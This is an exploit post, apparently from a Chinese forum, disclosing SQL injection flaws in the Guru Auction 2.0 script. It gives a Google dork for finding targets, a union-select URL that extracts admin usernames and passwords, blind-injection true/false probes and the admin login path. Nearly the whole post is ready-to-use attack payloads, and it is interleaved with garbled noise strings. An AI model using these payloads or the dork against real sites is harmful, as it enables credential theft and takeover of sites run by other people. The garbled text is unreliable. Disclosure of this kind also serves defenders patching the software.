Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
7 ?* f# |3 S4 r' X& K2 ]+ |5 m; D* D {6 r; i
作者 : v3n0m- ?+ G# h, h/ }! K7 J9 o9 v, }
应用 : Guru Auction 2.0+ V) d! T n) I2 V: a
Price : $495 K8 h% t: r& I2 y
Vendor : http://www.guruscript.com/
1 Q- L) C9 @! X0 j% dGoogle Dork : inurl:subcat.php?cate_id=1 u2 {2 L% H8 e( M
" Z9 n" i2 e: c! X4 d! j* E
SQLi p0c:
, H3 i) t( g1 C1 W1 J~~~~~~~~~~
8 {7 m1 b" Q' N `( c) T, p$ hhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--3 |& n' a: z# ?9 }5 M- M* |
3 P8 l4 F7 V, S9 s4 t; `5 C6 }
: t, p9 ^; m& _8 s9 Q; v! A1 e: K
盲注 p0c:5 E! H' ?% X0 @' |, W8 M
~~~~~~~~~~- J b. c1 y w& Y% x: H0 T/ Y7 L
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true- t. v1 B7 V! R
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false% X$ c6 S( | N' M. V
9 d' N2 y4 I" c0 j" C4 r) V' v
管理登录入口:
$ x- n n' @" y& S, v k~~~~~~~~~~
& m4 z' V- ?- o6 }9 K Khttp://domain.tld/[path]/admin// c0 ~1 J7 E6 _: Y) J* c# ]
|
发表于 2012-12-31 09:24:05
收藏
支持
反对